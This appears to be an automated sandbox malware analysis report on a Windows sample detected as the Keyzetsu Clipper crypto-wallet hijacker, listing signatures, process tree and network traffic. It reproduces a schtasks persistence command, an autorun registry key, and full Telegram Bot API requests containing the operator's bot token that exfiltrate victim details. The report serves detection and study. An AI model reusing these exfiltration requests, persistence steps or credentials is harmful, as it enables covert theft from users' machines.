Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nobtpajdjthawd.exe

Overview

General Information

Sample name:nobtpajdjthawd.exe
Analysis ID:1635473
MD5:37866be1ef3af2eb9f96671722a52ccf
SHA1:bc5fe4fed193686eee771c729c4d4144988e652e
SHA256:c1a4e75659105f547ab3ed1d3cd2b159f59841db1d77288601d005655132fe22
Tags:exeuser-aachum
Infos:

Detection

Keyzetsu Clipper
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Keyzetsu Clipper
.NET source code contains potential unpacker
.NET source code contains very large strings
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • nobtpajdjthawd.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\nobtpajdjthawd.exe" MD5: 37866BE1EF3AF2EB9F96671722A52CCF)
    • nobtpajdjthawd.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\nobtpajdjthawd.exe" MD5: 37866BE1EF3AF2EB9F96671722A52CCF)
      • schtasks.exe (PID: 7528 cmdline: "schtasks.exe" /create /tn Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 12:56 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • accc.exe (PID: 1252 cmdline: "C:\ProgramData\KMSAuto\accc.exe" MD5: 30135A08665EDEE181BCF001BDE7A458)
        • accc.exe (PID: 7188 cmdline: "C:\ProgramData\KMSAuto\accc.exe" MD5: 30135A08665EDEE181BCF001BDE7A458)
        • WerFault.exe (PID: 7540 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 764 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cmd.exe (PID: 5304 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5337.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2624 cmdline: timeout 7 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 7424 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7292 -s 800 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • accc.exe (PID: 5148 cmdline: "C:\ProgramData\KMSAuto\accc.exe" MD5: 30135A08665EDEE181BCF001BDE7A458)
    • accc.exe (PID: 1228 cmdline: "C:\ProgramData\KMSAuto\accc.exe" MD5: 30135A08665EDEE181BCF001BDE7A458)
    • WerFault.exe (PID: 5344 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 780 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.3636637468.00000000033D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_KeyzetsuClipperYara detected Keyzetsu ClipperJoe Security
    00000014.00000002.1364848533.00000000032C2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_KeyzetsuClipperYara detected Keyzetsu ClipperJoe Security
      00000014.00000002.1364848533.00000000032CD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_KeyzetsuClipperYara detected Keyzetsu ClipperJoe Security
        00000001.00000002.1312691830.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_KeyzetsuClipperYara detected Keyzetsu ClipperJoe Security
          Process Memory Space: nobtpajdjthawd.exe PID: 7324JoeSecurity_KeyzetsuClipperYara detected Keyzetsu ClipperJoe Security
            Click to see the 2 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\KMSAuto\accc.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\nobtpajdjthawd.exe, ProcessId: 7324, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tools

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T17:51:10.940495+010018100071Potentially Bad Traffic192.168.2.449718149.154.167.220443TCP
            2025-03-11T17:51:19.182564+010018100071Potentially Bad Traffic192.168.2.449724149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: nobtpajdjthawd.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\ProgramData\KMSAuto\accc.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Multi AV Scanner detection for submitted file
            Source: nobtpajdjthawd.exeReversingLabs: Detection: 81%
            Source: nobtpajdjthawd.exeVirustotal: Detection: 72%Perma Link
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49724 version: TLS 1.2
            Source: nobtpajdjthawd.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: nobtpajdjthawd.exe, accc.exe.1.dr
            Source: Binary string: System.Windows.Forms.pdbac source: WER6131.tmp.dmp.25.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: Portals.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: costura.dotnetzip.pdb.compressed source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1309844260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, accc.exe, 0000000E.00000002.1417102381.0000000003449000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003247000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: System.ni.pdbRSDS source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: Portals.pdb@\ source: WER5E53.tmp.dmp.23.dr
            Source: Binary string: mscorlib.ni.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: System.pdb) source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: costura.dotnetzip.pdb.compressed|||DotNetZip.pdb|565BABCBCD978AF66FE1150CC58FDEAFC9815822|622080 source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1309844260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, accc.exe, 0000000E.00000002.1417102381.0000000003449000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: nobtpajdjthawd.exe, accc.exe.1.dr
            Source: Binary string: q costura.dotnetzip.pdb.compressedlB source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000013.00000002.3636637468.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: p.pdb.compressed source: accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.dotnetzip.pdb.compressed@\ source: accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: System.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\tmp5337.tmp.batJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49724 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49718 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /bot7326900034:AAGf6EZ3UM79PKfc6LWxCq-R0p2wwmA0Nyo/sendMessage?chat_id=8124584176&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3E031912DB65A63CDAB5%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/932923%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E11/03/2025%2016:50:55%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CUsers%5Cuser%5CDesktop%5Cnobtpajdjthawd.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E923%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot7326900034:AAGf6EZ3UM79PKfc6LWxCq-R0p2wwmA0Nyo/sendMessage?chat_id=8124584176&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3E031912DB65A63CDAB5%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/932923%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E11/03/2025%2016:51:02%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CProgramData%5CKMSAuto%5Caccc.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E131%20MB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /bot7326900034:AAGf6EZ3UM79PKfc6LWxCq-R0p2wwmA0Nyo/sendMessage?chat_id=8124584176&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3E031912DB65A63CDAB5%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/932923%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E11/03/2025%2016:50:55%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CUsers%5Cuser%5CDesktop%5Cnobtpajdjthawd.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E923%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot7326900034:AAGf6EZ3UM79PKfc6LWxCq-R0p2wwmA0Nyo/sendMessage?chat_id=8124584176&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3E031912DB65A63CDAB5%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/932923%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E11/03/2025%2016:51:02%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CProgramData%5CKMSAuto%5Caccc.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E131%20MB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: accc.exe, 00000014.00000002.1359673420.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000013.00000002.3636637468.00000000033D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.000000000321C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.teleLR
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003259000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.000000000321C000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.000000000324C000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7326900034:AAGf6EZ3UM79PKfc6LWxCq-R0p2wwmA0Nyo/sendMessage?chat_id=81245
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49724 version: TLS 1.2

            System Summary

            barindex
            .NET source code contains very large strings
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, wpOcuqWsqP.csLong String: Length: 12792
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, wpOcuqWsqP.csLong String: Length: 29668
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, wpOcuqWsqP.csLong String: Length: 12332
            Source: 14.2.accc.exe.3449550.0.raw.unpack, wpOcuqWsqP.csLong String: Length: 12792
            Source: 14.2.accc.exe.3449550.0.raw.unpack, wpOcuqWsqP.csLong String: Length: 29668
            Source: 14.2.accc.exe.3449550.0.raw.unpack, wpOcuqWsqP.csLong String: Length: 12332
            Source: C:\ProgramData\KMSAuto\accc.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeCode function: 0_2_014326300_2_01432630
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeCode function: 1_2_014A67401_2_014A6740
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeCode function: 1_2_014A4BB01_2_014A4BB0
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeCode function: 1_2_014A97781_2_014A9778
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeCode function: 1_2_014A7FD01_2_014A7FD0
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeCode function: 1_2_014A67311_2_014A6731
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeCode function: 1_2_014A4B9F1_2_014A4B9F
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeCode function: 1_2_014A97681_2_014A9768
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 14_2_00A9253D14_2_00A9253D
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 15_2_0280253815_2_02802538
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 19_2_0191A59019_2_0191A590
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 19_2_01914BB019_2_01914BB0
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 19_2_01914B9F19_2_01914B9F
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 19_2_059119C419_2_059119C4
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 19_2_0591231819_2_05912318
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 19_2_0591230819_2_05912308
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 19_2_05913ED119_2_05913ED1
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 19_2_05911B7019_2_05911B70
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 19_2_05A8C1E019_2_05A8C1E0
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 19_2_05A867F819_2_05A867F8
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 19_2_05A87DB719_2_05A87DB7
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 20_2_019D4BB020_2_019D4BB0
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 20_2_019D4B9F20_2_019D4B9F
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7292 -s 800
            Source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePortals.exe0 vs nobtpajdjthawd.exe
